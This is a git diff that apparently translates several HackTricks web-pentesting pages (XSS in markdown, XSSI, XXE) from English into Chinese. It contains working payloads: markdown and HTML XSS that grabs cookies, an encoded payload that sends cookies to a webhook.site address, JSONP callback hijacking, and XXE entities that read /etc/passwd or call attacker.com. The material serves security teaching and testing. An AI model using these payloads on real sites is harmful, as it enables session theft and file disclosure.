-  2608, 2638, 2701, 2702, 2710, 2717, 2718, 2725, 2800, 2809, 2811, 2869, 2875,
-  2909, 2910, 2920, 2967, 2968, 2998, 3000, 3001, 3003, 3005, 3006, 3007, 3011,
-  3013, 3017, 3030, 3031, 3052, 3071, 3077, 3128, 3168, 3211, 3221, 3260, 3261,
-  3268, 3269, 3283, 3300, 3301, 3306, 3322, 3323, 3324, 3325, 3333, 3351, 3367,
-  3369, 3370, 3371, 3372, 3389, 3390, 3404, 3476, 3493, 3517, 3527, 3546, 3551,
-  3580, 3659, 3689, 3690, 3703, 3737, 3766, 3784, 3800, 3801, 3809, 3814, 3826,
-  3827, 3828, 3851, 3869, 3871, 3878, 3880, 3889, 3905, 3914, 3918, 3920, 3945,
-  3971, 3986, 3995, 3998, 4000, 4001, 4002, 4003, 4004, 4005, 4006, 4045, 4111,
-  4125, 4126, 4129, 4224, 4242, 4279, 4321, 4343, 4443, 4444, 4445, 4446, 4449,
-  4550, 4567, 4662, 4848, 4899, 4900, 4998, 5000, 5001, 5002, 5003, 5004, 5009,
-  5030, 5033, 5050, 5051, 5054, 5060, 5061, 5080, 5087, 5100, 5101, 5102, 5120,
-  5190, 5200, 5214, 5221, 5222, 5225, 5226, 5269, 5280, 5298, 5357, 5405, 5414,
-  5431, 5432, 5440, 5500, 5510, 5544, 5550, 5555, 5560, 5566, 5631, 5633, 5666,
-  5678, 5679, 5718, 5730, 5800, 5801, 5802, 5810, 5811, 5815, 5822, 5825, 5850,
-  5859, 5862, 5877, 5900, 5901, 5902, 5903, 5904, 5906, 5907, 5910, 5911, 5915,
-  5922, 5925, 5950, 5952, 5959, 5960, 5961, 5962, 5963, 5987, 5988, 5989, 5998,
-  5999, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 6009, 6025, 6059, 6100,
-  6101, 6106, 6112, 6123, 6129, 6156, 6346, 6389, 6502, 6510, 6543, 6547, 6565,
-  6566, 6567, 6580, 6646, 6666, 6667, 6668, 6669, 6689, 6692, 6699, 6779, 6788,
-  6789, 6792, 6839, 6881, 6901, 6969, 7000, 7001, 7002, 7004, 7007, 7019, 7025,
-  7070, 7100, 7103, 7106, 7200, 7201, 7402, 7435, 7443, 7496, 7512, 7625, 7627,
-  7676, 7741, 7777, 7778, 7800, 7911, 7920, 7921, 7937, 7938, 7999, 8000, 8001,
-  8002, 8007, 8008, 8009, 8010, 8011, 8021, 8022, 8031, 8042, 8045, 8080, 8081,
-  8082, 8083, 8084, 8085, 8086, 8087, 8088, 8089, 8090, 8093, 8099, 8100, 8180,
-  8181, 8192, 8193, 8194, 8200, 8222, 8254, 8290, 8291, 8292, 8300, 8333, 8383,
-  8400, 8402, 8443, 8500, 8600, 8649, 8651, 8652, 8654, 8701, 8800, 8873, 8888,
-  8899, 8994, 9000, 9001, 9002, 9003, 9009, 9010, 9011, 9040, 9050, 9071, 9080,
-  9081, 9090, 9091, 9099, 9100, 9101, 9102, 9103, 9110, 9111, 9200, 9207, 9220,
-  9290, 9415, 9418, 9485, 9500, 9502, 9503, 9535, 9575, 9593, 9594, 9595, 9618,
-  9666, 9876, 9877, 9878, 9898, 9900, 9917, 9929, 9943, 9944, 9968, 9998, 9999,
-  10000, 10001, 10002, 10003, 10004, 10009, 10010, 10012, 10024, 10025, 10082,
-  10180, 10215, 10243, 10566, 10616, 10617, 10621, 10626, 10628, 10629, 10778,
-  11110, 11111, 11967, 12000, 12174, 12265, 12345, 13456, 13722, 13782, 13783,
-  14000, 14238, 14441, 14442, 15000, 15002, 15003, 15004, 15660, 15742, 16000,
-  16001, 16012, 16016, 16018, 16080, 16113, 16992, 16993, 17877, 17988, 18040,
-  18101, 18988, 19101, 19283, 19315, 19350, 19780, 19801, 19842, 20000, 20005,
-  20031, 20221, 20222, 20828, 21571, 22939, 23502, 24444, 24800, 25734, 25735,
-  26214, 27000, 27352, 27353, 27355, 27356, 27715, 28201, 30000, 30718, 30951,
-  31038, 31337, 32768, 32769, 32770, 32771, 32772, 32773, 32774, 32775, 32776,
-  32777, 32778, 32779, 32780, 32781, 32782, 32783, 32784, 32785, 33354, 33899,
-  34571, 34572, 34573, 35500, 38292, 40193, 40911, 41511, 42510, 44176, 44442,
-  44443, 44501, 45100, 48080, 49152, 49153, 49154, 49155, 49156, 49157, 49158,
-  49159, 49160, 49161, 49163, 49165, 49167, 49175, 49176, 49400, 49999, 50000,
-  50001, 50002, 50003, 50006, 50300, 50389, 50500, 50636, 50800, 51103, 51493,
-  52673, 52822, 52848, 52869, 54045, 54328, 55055, 55056, 55555, 55600, 56737,
-  56738, 57294, 57797, 58080, 60020, 60443, 61532, 61900, 62078, 63331, 64623,
-  64680, 65000, 65129, 65389,
+1, 3, 4, 6, 7, 9, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 30, 32, 33, 37, 42,
+43, 49, 53, 70, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 99, 100, 106, 109,
+110, 111, 113, 119, 125, 135, 139, 143, 144, 146, 161, 163, 179, 199, 211,
+212, 222, 254, 255, 256, 259, 264, 280, 301, 306, 311, 340, 366, 389, 406,
+407, 416, 417, 425, 427, 443, 444, 445, 458, 464, 465, 481, 497, 500, 512,
+513, 514, 515, 524, 541, 543, 544, 545, 548, 554, 555, 563, 587, 593, 616,
+617, 625, 631, 636, 646, 648, 666, 667, 668, 683, 687, 691, 700, 705, 711,
+714, 720, 722, 726, 749, 765, 777, 783, 787, 800, 801, 808, 843, 873, 880,
+888, 898, 900, 901, 902, 903, 911, 912, 981, 987, 990, 992, 993, 995, 999,
+1000, 1001, 1002, 1007, 1009, 1010, 1011, 1021, 1022, 1023, 1024, 1025, 1026,
+1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039,
+1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052,
+1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065,
+1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078,
+1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091,
+1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1102, 1104, 1105, 1106,
+1107, 1108, 1110, 1111, 1112, 1113, 1114, 1117, 1119, 1121, 1122, 1123, 1124,
+1126, 1130, 1131, 1132, 1137, 1138, 1141, 1145, 1147, 1148, 1149, 1151, 1152,
+1154, 1163, 1164, 1165, 1166, 1169, 1174, 1175, 1183, 1185, 1186, 1187, 1192,
+1198, 1199, 1201, 1213, 1216, 1217, 1218, 1233, 1234, 1236, 1244, 1247, 1248,
+1259, 1271, 1272, 1277, 1287, 1296, 1300, 1301, 1309, 1310, 1311, 1322, 1328,
+1334, 1352, 1417, 1433, 1434, 1443, 1455, 1461, 1494, 1500, 1501, 1503, 1521,
+1524, 1533, 1556, 1580, 1583, 1594, 1600, 1641, 1658, 1666, 1687, 1688, 1700,
+1717, 1718, 1719, 1720, 1721, 1723, 1755, 1761, 1782, 1783, 1801, 1805, 1812,
+1839, 1840, 1862, 1863, 1864, 1875, 1900, 1914, 1935, 1947, 1971, 1972, 1974,
+1984, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009,
+2010, 2013, 2020, 2021, 2022, 2030, 2033, 2034, 2035, 2038, 2040, 2041, 2042,
+2043, 2045, 2046, 2047, 2048, 2049, 2065, 2068, 2099, 2100, 2103, 2105, 2106,
+2107, 2111, 2119, 2121, 2126, 2135, 2144, 2160, 2161, 2170, 2179, 2190, 2191,
+2196, 2200, 2222, 2251, 2260, 2288, 2301, 2323, 2366, 2381, 2382, 2383, 2393,
+2394, 2399, 2401, 2492, 2500, 2522, 2525, 2557, 2601, 2602, 2604, 2605, 2607,
+2608, 2638, 2701, 2702, 2710, 2717, 2718, 2725, 2800, 2809, 2811, 2869, 2875,
+2909, 2910, 2920, 2967, 2968, 2998, 3000, 3001, 3003, 3005, 3006, 3007, 3011,
+3013, 3017, 3030, 3031, 3052, 3071, 3077, 3128, 3168, 3211, 3221, 3260, 3261,
+3268, 3269, 3283, 3300, 3301, 3306, 3322, 3323, 3324, 3325, 3333, 3351, 3367,
+3369, 3370, 3371, 3372, 3389, 3390, 3404, 3476, 3493, 3517, 3527, 3546, 3551,
+3580, 3659, 3689, 3690, 3703, 3737, 3766, 3784, 3800, 3801, 3809, 3814, 3826,
+3827, 3828, 3851, 3869, 3871, 3878, 3880, 3889, 3905, 3914, 3918, 3920, 3945,
+3971, 3986, 3995, 3998, 4000, 4001, 4002, 4003, 4004, 4005, 4006, 4045, 4111,
+4125, 4126, 4129, 4224, 4242, 4279, 4321, 4343, 4443, 4444, 4445, 4446, 4449,
+4550, 4567, 4662, 4848, 4899, 4900, 4998, 5000, 5001, 5002, 5003, 5004, 5009,
+5030, 5033, 5050, 5051, 5054, 5060, 5061, 5080, 5087, 5100, 5101, 5102, 5120,
+5190, 5200, 5214, 5221, 5222, 5225, 5226, 5269, 5280, 5298, 5357, 5405, 5414,
+5431, 5432, 5440, 5500, 5510, 5544, 5550, 5555, 5560, 5566, 5631, 5633, 5666,
+5678, 5679, 5718, 5730, 5800, 5801, 5802, 5810, 5811, 5815, 5822, 5825, 5850,
+5859, 5862, 5877, 5900, 5901, 5902, 5903, 5904, 5906, 5907, 5910, 5911, 5915,
+5922, 5925, 5950, 5952, 5959, 5960, 5961, 5962, 5963, 5987, 5988, 5989, 5998,
+5999, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 6009, 6025, 6059, 6100,
+6101, 6106, 6112, 6123, 6129, 6156, 6346, 6389, 6502, 6510, 6543, 6547, 6565,
+6566, 6567, 6580, 6646, 6666, 6667, 6668, 6669, 6689, 6692, 6699, 6779, 6788,
+6789, 6792, 6839, 6881, 6901, 6969, 7000, 7001, 7002, 7004, 7007, 7019, 7025,
+7070, 7100, 7103, 7106, 7200, 7201, 7402, 7435, 7443, 7496, 7512, 7625, 7627,
+7676, 7741, 7777, 7778, 7800, 7911, 7920, 7921, 7937, 7938, 7999, 8000, 8001,
+8002, 8007, 8008, 8009, 8010, 8011, 8021, 8022, 8031, 8042, 8045, 8080, 8081,
+8082, 8083, 8084, 8085, 8086, 8087, 8088, 8089, 8090, 8093, 8099, 8100, 8180,
+8181, 8192, 8193, 8194, 8200, 8222, 8254, 8290, 8291, 8292, 8300, 8333, 8383,
+8400, 8402, 8443, 8500, 8600, 8649, 8651, 8652, 8654, 8701, 8800, 8873, 8888,
+8899, 8994, 9000, 9001, 9002, 9003, 9009, 9010, 9011, 9040, 9050, 9071, 9080,
+9081, 9090, 9091, 9099, 9100, 9101, 9102, 9103, 9110, 9111, 9200, 9207, 9220,
+9290, 9415, 9418, 9485, 9500, 9502, 9503, 9535, 9575, 9593, 9594, 9595, 9618,
+9666, 9876, 9877, 9878, 9898, 9900, 9917, 9929, 9943, 9944, 9968, 9998, 9999,
+10000, 10001, 10002, 10003, 10004, 10009, 10010, 10012, 10024, 10025, 10082,
+10180, 10215, 10243, 10566, 10616, 10617, 10621, 10626, 10628, 10629, 10778,
+11110, 11111, 11967, 12000, 12174, 12265, 12345, 13456, 13722, 13782, 13783,
+14000, 14238, 14441, 14442, 15000, 15002, 15003, 15004, 15660, 15742, 16000,
+16001, 16012, 16016, 16018, 16080, 16113, 16992, 16993, 17877, 17988, 18040,
+18101, 18988, 19101, 19283, 19315, 19350, 19780, 19801, 19842, 20000, 20005,
+20031, 20221, 20222, 20828, 21571, 22939, 23502, 24444, 24800, 25734, 25735,
+26214, 27000, 27352, 27353, 27355, 27356, 27715, 28201, 30000, 30718, 30951,
+31038, 31337, 32768, 32769, 32770, 32771, 32772, 32773, 32774, 32775, 32776,
+32777, 32778, 32779, 32780, 32781, 32782, 32783, 32784, 32785, 33354, 33899,
+34571, 34572, 34573, 35500, 38292, 40193, 40911, 41511, 42510, 44176, 44442,
+44443, 44501, 45100, 48080, 49152, 49153, 49154, 49155, 49156, 49157, 49158,
+49159, 49160, 49161, 49163, 49165, 49167, 49175, 49176, 49400, 49999, 50000,
+50001, 50002, 50003, 50006, 50300, 50389, 50500, 50636, 50800, 51103, 51493,
+52673, 52822, 52848, 52869, 54045, 54328, 55055, 55056, 55555, 55600, 56737,
+56738, 57294, 57797, 58080, 60020, 60443, 61532, 61900, 62078, 63331, 64623,
+64680, 65000, 65129, 65389,
 ]
 top_1000.forEach((port) => exfil_internal_port(port))
 
 if (EXFIL_BY_LOC) {
-  setTimeout(exfil_info("finish", "finish", true), 5000) // exfiltrate by location after 5s
+setTimeout(exfil_info("finish", "finish", true), 5000) // exfiltrate by location after 5s
 }
 
 // Sniff info
 window.onmessage = function (e) {
-  exfil_info("onmessage", encode(e.data))
+exfil_info("onmessage", encode(e.data))
 }
 ```
-
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
index 272bd3fa0..ea11ba8d1 100644
--- a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
+++ b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
@@ -2,26 +2,23 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-If you have the chance to inject code in markdown, there are a few options you can use to trigger a XSS when the code gets interpreted.
+如果你有机会在markdown中注入代码，有几种选项可以在代码被解释时触发XSS。
 
 ### HTML tags
 
-The most common way to get XSS in markdown is to inject common HTML tags that execute javascript, because several makdown interpreters will also accept HTML
-
+在markdown中获取XSS的最常见方法是注入执行javascript的常见HTML标签，因为几个markdown解释器也会接受HTML。
 ```html
 <!-- XSS with regular tags -->
 <script>
-  alert(1)
+alert(1)
 </script>
 <img src="x" onerror="alert(1)" />
 ```
+您可以在[hacktricks的主XSS页面](./)找到更多示例。
 
-You can find more examples in the [main XSS page of hacktricks](./).
-
-### Javascript links
-
-If HTML tags aren't an option you could always try to play with markdown syntax:
+### Javascript链接
 
+如果HTML标签不是一个选项，您可以尝试使用markdown语法：
 ```html
 <!-- markdow link to XSS, this usually always work but it requires interaction -->
 [a](javascript:prompt(document.cookie))
@@ -36,62 +33,54 @@ t:prompt(document.cookie))
 [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
 [a](javascript:window.onerror=alert;throw%201)
 ```
-
-### Img event syntax abuse
-
+### Img事件语法滥用
 ```markdown
 ![Uh oh...](<"onerror="alert('XSS')>)
 ![Uh oh...](<https://www.example.com/image.png"onload="alert('XSS')>)
 ![Escape SRC - onload](<https://www.example.com/image.png"onload="alert('ImageOnLoad')>)
 ![Escape SRC - onerror](<"onerror="alert('ImageOnError')>)
 ```
-
 ### HTML Sanitiser Markdown Bypass
 
-The following code is **sanitising HTML input** and then **passing it to the markdown parser**, then, XSS can be triggered abusing miss-interpretations between Markdown and DOMPurify&#x20;
-
+以下代码是**清理 HTML 输入**，然后**将其传递给 markdown 解析器**，然后，XSS 可以通过滥用 Markdown 和 DOMPurify 之间的误解来触发。
 ```html
 <!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
 <script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
 <script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
 <script>
-  const qs = new URLSearchParams(location.search)
-  if (qs.get("content")?.length > 0) {
-    document.body.innerHTML = marked.parse(
-      DOMPurify.sanitize(qs.get("content"))
-    )
-  }
+const qs = new URLSearchParams(location.search)
+if (qs.get("content")?.length > 0) {
+document.body.innerHTML = marked.parse(
+DOMPurify.sanitize(qs.get("content"))
+)
+}
 </script>
 ```
-
-Payloads example:
-
+有效载荷示例：
 ```html
 <div
-  id="1
+id="1
 
 ![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-  -----------------------------------------------
-  <a
-    title="a
+-----------------------------------------------
+<a
+title="a
 
 <img src=x onerror=alert(1)>"
-    >yep</a
-  >
-  ------------------------------------------------ [x](y '<style>
-    ')<!--
-  </style>
-  <div id="x--><img src=1 onerror=alert(1)>"></div>
-  ---------------------------------------------- [
-  <p
-    x="<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#"></p>
-  ) ---------------------------------------------- `
-  <p x="`<img src=x onerror=alert(1)>"></p>
+>yep</a
+>
+------------------------------------------------ [x](y '<style>
+')<!--
+</style>
+<div id="x--><img src=1 onerror=alert(1)>"></div>
+---------------------------------------------- [
+<p
+x="<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#"></p>
+) ---------------------------------------------- `
+<p x="`<img src=x onerror=alert(1)>"></p>
 </div>
 ```
-
-### Fuzzing
-
+### 模糊测试
 ```html
 <!--
 Fuzzing examples from
@@ -167,6 +156,4 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA
 ![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
 ![XSS'"`onerror=prompt(document.cookie)](x)\
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xssi-cross-site-script-inclusion.md b/src/pentesting-web/xssi-cross-site-script-inclusion.md
index 7adda7f22..80e68e6e9 100644
--- a/src/pentesting-web/xssi-cross-site-script-inclusion.md
+++ b/src/pentesting-web/xssi-cross-site-script-inclusion.md
@@ -2,100 +2,91 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**Cross-Site Script Inclusion (XSSI)** is a vulnerability that arises from the nature of the `script` tag in HTML. Unlike most resources, which are subject to the **Same-Origin Policy (SOP)**, scripts can be included from different domains. This behavior is intended to facilitate the use of libraries and other resources hosted on different servers but also introduces a potential security risk.
+**跨站脚本包含 (XSSI)** 是一种漏洞，源于 HTML 中 `script` 标签的特性。与大多数资源不同，**同源策略 (SOP)** 并不适用于脚本，因此可以从不同域名中包含脚本。这种行为旨在促进使用托管在不同服务器上的库和其他资源，但也引入了潜在的安全风险。
 
-### Key Characteristics of **XSSI**:
+### **XSSI** 的关键特征：
 
-- **Bypass of SOP**: Scripts are exempt from the **Same-Origin Policy**, allowing them to be included across domains.
-- **Data Exposure**: An attacker can exploit this behavior to read data loaded via the `script` tag.
-- **Impact on Dynamic JavaScript/JSONP**: **XSSI** is particularly relevant for dynamic JavaScript or **JSON with Padding (JSONP)**. These technologies often use "ambient-authority" information (like cookies) for authentication. When a script request is made to a different host, these credentials (e.g., cookies) are automatically included in the request.
-- **Authentication Token Leakage**: If an attacker can trick a user's browser into requesting a script from a server they control, they might be able to access sensitive information contained in these requests.
+- **绕过 SOP**：脚本不受 **同源政策** 的限制，允许跨域包含。
+- **数据暴露**：攻击者可以利用这种行为读取通过 `script` 标签加载的数据。
+- **对动态 JavaScript/JSONP 的影响**：**XSSI** 对动态 JavaScript 或 **带填充的 JSON (JSONP)** 特别相关。这些技术通常使用“环境权限”信息（如 cookies）进行身份验证。当向不同主机发出脚本请求时，这些凭据（例如 cookies）会自动包含在请求中。
+- **身份验证令牌泄露**：如果攻击者能够欺骗用户的浏览器请求来自他们控制的服务器的脚本，他们可能能够访问这些请求中包含的敏感信息。
 
-### Types
+### 类型
 
-1. **Static JavaScript** - This represents the conventional form of XSSI.
-2. **Static JavaScript with Authentication** - This type is distinct because it requires authentication to access.
-3. **Dynamic JavaScript** - Involves JavaScript that dynamically generates content.
-4. **Non-JavaScript** - Refers to vulnerabilities that do not involve JavaScript directly.
+1. **静态 JavaScript** - 这代表了传统形式的 XSSI。
+2. **带身份验证的静态 JavaScript** - 这种类型不同，因为它需要身份验证才能访问。
+3. **动态 JavaScript** - 涉及动态生成内容的 JavaScript。
+4. **非 JavaScript** - 指不直接涉及 JavaScript 的漏洞。
 
-**The following information is a sumary of [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)**. Check it for further details.
+**以下信息是 [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414) 的总结。请查看以获取更多详细信息。**
 
-### Regular XSSI
-
-In this approach, private information is embedded within a globally accessible JavaScript file. Attackers can identify these files using methods like file reading, keyword searches, or regular expressions. Once located, the script containing private information can be included in malicious content, allowing unauthorized access to sensitive data. An example exploitation technique is shown below:
+### 常规 XSSI
 
+在这种方法中，私人信息嵌入在一个全球可访问的 JavaScript 文件中。攻击者可以使用文件读取、关键字搜索或正则表达式等方法识别这些文件。一旦找到，包含私人信息的脚本可以被包含在恶意内容中，从而允许未经授权访问敏感数据。下面展示了一种示例利用技术：
 ```html
 <script src="https://www.vulnerable-domain.tld/script.js"></script>
 <script>
-  alert(JSON.stringify(confidential_keys[0]))
+alert(JSON.stringify(confidential_keys[0]))
 </script>
 ```
+### 动态JavaScript基础的XSSI和认证JavaScript-XSSI
 
-### Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
-
-These types of XSSI attacks involve confidential information being dynamically added to the script in response to a user's request. Detection can be performed by sending requests with and without cookies and comparing the responses. If the information differs, it may indicate the presence of confidential information. This process can be automated using tools like the [DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) Burp extension.
-
-If confidential data is stored in a global variable, it can be exploited using similar methods to those used in Regular XSSI. However, if the confidential data is included in a JSONP response, attackers can hijack the callback function to retrieve the information. This can be done by either manipulating global objects or setting up a function to be executed by the JSONP response, as demonstrated below:
+这些类型的XSSI攻击涉及机密信息根据用户请求动态添加到脚本中。可以通过发送带有和不带有cookie的请求并比较响应来进行检测。如果信息不同，这可能表明存在机密信息。可以使用像[DetectDynamicJS](https://github.com/luh2/DetectDynamicJS)这样的Burp扩展来自动化此过程。
 
+如果机密数据存储在全局变量中，可以使用与常规XSSI相似的方法进行利用。然而，如果机密数据包含在JSONP响应中，攻击者可以劫持回调函数以检索信息。这可以通过操纵全局对象或设置一个由JSONP响应执行的函数来完成，如下所示：
 ```html
 <script>
-  var angular = function () {
-    return 1
-  }
-  angular.callbacks = function () {
-    return 1
-  }
-  angular.callbacks._7 = function (leaked) {
-    alert(JSON.stringify(leaked))
-  }
+var angular = function () {
+return 1
+}
+angular.callbacks = function () {
+return 1
+}
+angular.callbacks._7 = function (leaked) {
+alert(JSON.stringify(leaked))
+}
 </script>
 <script
-  src="https://site.tld/p?jsonp=angular.callbacks._7"
-  type="text/javascript"></script>
+src="https://site.tld/p?jsonp=angular.callbacks._7"
+type="text/javascript"></script>
 ```
 
 ```html
 <script>
-  leak = function (leaked) {
-    alert(JSON.stringify(leaked))
-  }
+leak = function (leaked) {
+alert(JSON.stringify(leaked))
+}
 </script>
 <script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
 ```
-
-For variables not residing in the global namespace, _prototype tampering_ can sometimes be exploited. This technique leverages JavaScript's design, where code interpretation involves traversing the prototype chain to locate the called property. By overriding certain functions, such as `Array`'s `slice`, attackers can access and leak non-global variables:
-
+对于不在全局命名空间中的变量，_prototype tampering_ 有时可以被利用。该技术利用了 JavaScript 的设计，其中代码解释涉及遍历原型链以定位被调用的属性。通过重写某些函数，例如 `Array` 的 `slice`，攻击者可以访问并泄露非全局变量：
 ```javascript
 Array.prototype.slice = function () {
-  // leaks ["secret1", "secret2", "secret3"]
-  sendToAttackerBackend(this)
+// leaks ["secret1", "secret2", "secret3"]
+sendToAttackerBackend(this)
 }
 ```
-
-Further details on attack vectors can be found in the work of Security Researcher [Sebastian Lekies](https://twitter.com/slekies), who maintains a list of [vectors](http://sebastian-lekies.de/leak/).
+进一步的攻击向量细节可以在安全研究员 [Sebastian Lekies](https://twitter.com/slekies) 的工作中找到，他维护着一个 [vectors](http://sebastian-lekies.de/leak/) 列表。
 
 ### Non-Script-XSSI
 
-Takeshi Terada's research introduces another form of XSSI, where Non-Script files, such as CSV, are leaked cross-origin by being included as sources in a `script` tag. Historical instances of XSSI, such as Jeremiah Grossman’s 2006 attack to read a complete Google address book and Joe Walker’s 2007 JSON data leak, highlight the severity of these threats. Additionally, Gareth Heyes describes an attack variant involving UTF-7 encoded JSON to escape the JSON format and execute scripts, effective in certain browsers:
-
+Takeshi Terada 的研究介绍了另一种 XSSI 形式，其中 Non-Script 文件，如 CSV，通过作为 `script` 标签中的源被跨源泄露。历史上 XSSI 的实例，如 Jeremiah Grossman 在 2006 年的攻击以读取完整的 Google 地址簿和 Joe Walker 在 2007 年的 JSON 数据泄露，突显了这些威胁的严重性。此外，Gareth Heyes 描述了一种攻击变体，涉及 UTF-7 编码的 JSON，以逃避 JSON 格式并执行脚本，在某些浏览器中有效：
 ```javascript
 ;[
-  {
-    friend: "luke",
-    email:
-      "+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-",
-  },
+{
+friend: "luke",
+email:
+"+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-",
+},
 ]
 ```
 
 ```html
 <script
-  src="http://site.tld/json-utf7.json"
-  type="text/javascript"
-  charset="UTF-7"></script>
+src="http://site.tld/json-utf7.json"
+type="text/javascript"
+charset="UTF-7"></script>
 ```
-
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md
index df5e77448..6616ad0ae 100644
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -6,61 +6,54 @@
 
 {% embed url="https://websec.nl/" %}
 
-## XML Basics
+## XML基础
 
-XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.
+XML是一种用于数据存储和传输的标记语言，具有灵活的结构，允许使用描述性命名的标签。它与HTML的不同之处在于不受限于一组预定义标签。尽管XML在AJAX技术中的初始作用显著，但随着JSON的兴起，其重要性已下降。
 
-- **Data Representation through Entities**: Entities in XML enable the representation of data, including special characters like `&lt;` and `&gt;`, which correspond to `<` and `>` to avoid conflict with XML's tag system.
-- **Defining XML Elements**: XML allows for the definition of element types, outlining how elements should be structured and what content they may contain, ranging from any type of content to specific child elements.
-- **Document Type Definition (DTD)**: DTDs are crucial in XML for defining the document's structure and the types of data it can contain. They can be internal, external, or a combination, guiding how documents are formatted and validated.
-- **Custom and External Entities**: XML supports the creation of custom entities within a DTD for flexible data representation. External entities, defined with a URL, raise security concerns, particularly in the context of XML External Entity (XXE) attacks, which exploit the way XML parsers handle external data sources: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
-- **XXE Detection with Parameter Entities**: For detecting XXE vulnerabilities, especially when conventional methods fail due to parser security measures, XML parameter entities can be utilized. These entities allow for out-of-band detection techniques, such as triggering DNS lookups or HTTP requests to a controlled domain, to confirm the vulnerability.
-  - `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
-  - `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
+- **通过实体表示数据**：XML中的实体使得数据的表示成为可能，包括特殊字符如`&lt;`和`&gt;`，它们分别对应于`<`和`>`，以避免与XML的标签系统发生冲突。
+- **定义XML元素**：XML允许定义元素类型，概述元素应如何结构化以及可以包含哪些内容，从任何类型的内容到特定的子元素。
+- **文档类型定义（DTD）**：DTD在XML中至关重要，用于定义文档的结构和可以包含的数据类型。它们可以是内部的、外部的或两者的组合，指导文档的格式和验证。
+- **自定义和外部实体**：XML支持在DTD中创建自定义实体，以实现灵活的数据表示。外部实体通过URL定义，带来了安全隐患，特别是在XML外部实体（XXE）攻击的背景下，这些攻击利用XML解析器处理外部数据源的方式：`<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
+- **使用参数实体检测XXE**：为了检测XXE漏洞，特别是在常规方法因解析器安全措施而失败时，可以利用XML参数实体。这些实体允许使用带外检测技术，例如触发DNS查找或向受控域发出HTTP请求，以确认漏洞。
+- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
+- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
 
-## Main attacks
+## 主要攻击
 
-[**Most of these attacks were tested using the awesome Portswiggers XEE labs: https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
+[**这些攻击大多是在出色的Portswiggers XEE实验室中测试的： https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
 
-### New Entity test
-
-In this attack I'm going to test if a simple new ENTITY declaration is working
+### 新实体测试
 
+在这次攻击中，我将测试一个简单的新ENTITY声明是否有效。
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
